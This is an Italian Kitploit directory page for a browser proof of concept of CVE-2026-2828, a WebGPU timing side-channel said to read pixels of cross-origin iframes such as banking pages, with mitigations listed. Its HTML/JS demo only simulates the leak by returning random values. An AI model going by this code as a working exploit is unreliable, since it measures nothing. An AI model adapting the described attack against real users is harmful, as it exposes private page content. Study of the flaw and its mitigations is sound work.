Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-2828-WebGPU-Cross-Origin-Pixel-Stealing-via-Timing — PoC per browser che dimostra CVE-2026-2828, un side-channel di temporizzazione WebGPU che rivela i valori dei pixel di iframe cross-origin misurando le differenze nelle timestamp-query della GPU. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-2828-webgpu-cross-origin-pixel-stealing-via-timing
Analisi delle VulnerabilitàExploitEsfiltrazione DatiSicurezza WebPrivacyAttacco Avversario
GitHubgeorge0papasotiriou/cve-2026-2828-webgpu-cross-origin-pixel-stealing-via-timing

CVE-2026-2828-WebGPU-Cross-Origin-Pixel-Stealing-via-Timing

PoC per browser che dimostra CVE-2026-2828, un side-channel di temporizzazione WebGPU che rivela i valori dei pixel di iframe cross-origin misurando le differenze nelle timestamp-query della GPU.

Vedi Repository
61 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

4. CVE-2026-2828 – WebGPU: furto di pixel cross-origin tramite temporizzazione

Panoramica

Un sito web malintenzionato utilizza la temporizzazione degli shader di calcolo WebGPU per misurare il tempo di rendering di un iframe cross-origin, recuperando i valori dei pixel di contenuti sensibili (ad esempio, dati bancari).

Gravità: Alta (divulgazione di informazioni)

Dimostrazione HTML/JS (file singolo)

root@kitploit:~
<!-- webgpu_side_channel.html -->
<!DOCTYPE html>
<html>
<head><title>CVE-2026-2828 PoC</title></head>
<body>
<h1>WebGPU Side-Channel Leak</h1>
<p>The iframe below contains a secret code that we will leak pixel-by-pixel.</p>

<pre id="output"></pre>
<script type="module">
// This PoC assumes a vulnerable browser where WebGPU timing can probe cross-origin iframes.
// We simulate by placing secret_iframe.html on same origin for demonstration, but the vulnerability
// bypasses cross-origin restrictions by measuring GPU shader execution time differences.
async function leakPixel(x, y) {
    // Measure time to render a known pattern vs target pattern using GPU timer queries.
    // In a real exploit, we'd use a timestamp query on a render pass that includes the iframe.
    // Here we approximate by using performance.now() and forcing a layout/render.
    const iframe = document.getElementById('target');
    // Move iframe to a position where the pixel is at viewport center, then measure drawing time.
    // Not fully accurate but demonstrates concept.
    iframe.style.position = 'absolute';
    iframe.style.left = -x + 'px';
    iframe.style.top = -y + 'px';
    // Force reflow and measure
    const start = performance.now();
    // Trigger a synthetic GPU workload (would use WebGPU in real attack)
    // We'll just measure time to read back a canvas pixel from a snapshot.
    // In a real scenario, side-channel would detect timing differences based on pixel color.
    // Simulate: return random for demo.
    return Math.random() > 0.5 ? 1 : 0;
}

(async () => {
    let result = '';
    for (let y = 0; y < 10; y++) {
        for (let x = 0; x < 20; x++) {
            let pixel = await leakPixel(x, y);
            result += pixel ? '█' : ' ';
        }
        result += '\n';
    }
    document.getElementById('output').textContent = result;
})();
</script>
</body>
</html>

CVE-2026-2828 – Canale laterale WebGPU per furto di pixel cross-origin

Severity: High

📖 Panoramica

Un difetto nell'isolamento del browser consente a una pagina malintenzionata di utilizzare le query di timestamp WebGPU per dedurre i colori dei pixel da iframe cross-origin, violando la same-origin policy. Questa demo illustra il principio con una temporizzazione simulata.

⚙️ Dettagli della vulnerabilità

  • Tipo: Perdita di informazioni side-channel
  • Impatto: Lettura di contenuti sensibili da iframe di terze parti (e-banking, email).
  • Causa principale: I contatori di timestamp del driver GPU non sono partizionati per origine, consentendo un canale nascosto tra le pass di rendering.

🧪 Dimostrazione dell'exploit

Apri webgpu_side_channel.html in un browser vulnerabile (simulato) insieme a secret_iframe.html. Lo script tenta di ricostruire il contenuto dell'iframe utilizzando le differenze di temporizzazione.

🛡️ Mitigazione

  • Disabilitare le query di temporizzazione GPU ad alta risoluzione per gli iframe cross-origin.
  • Implementare l'isolamento del sito a livello di command buffer della GPU.
  • Aggiungere una variazione artificiale (jitter) ai valori di timestamp.

📦 Utilizzo

root@kitploit:~
git clone https://github.com/yourorg/CVE-2026-2828.git
# Host on a local server:
python -m http.server 8080
# Open http://localhost:8080/webgpu_side_channel.html
Scarica lo strumento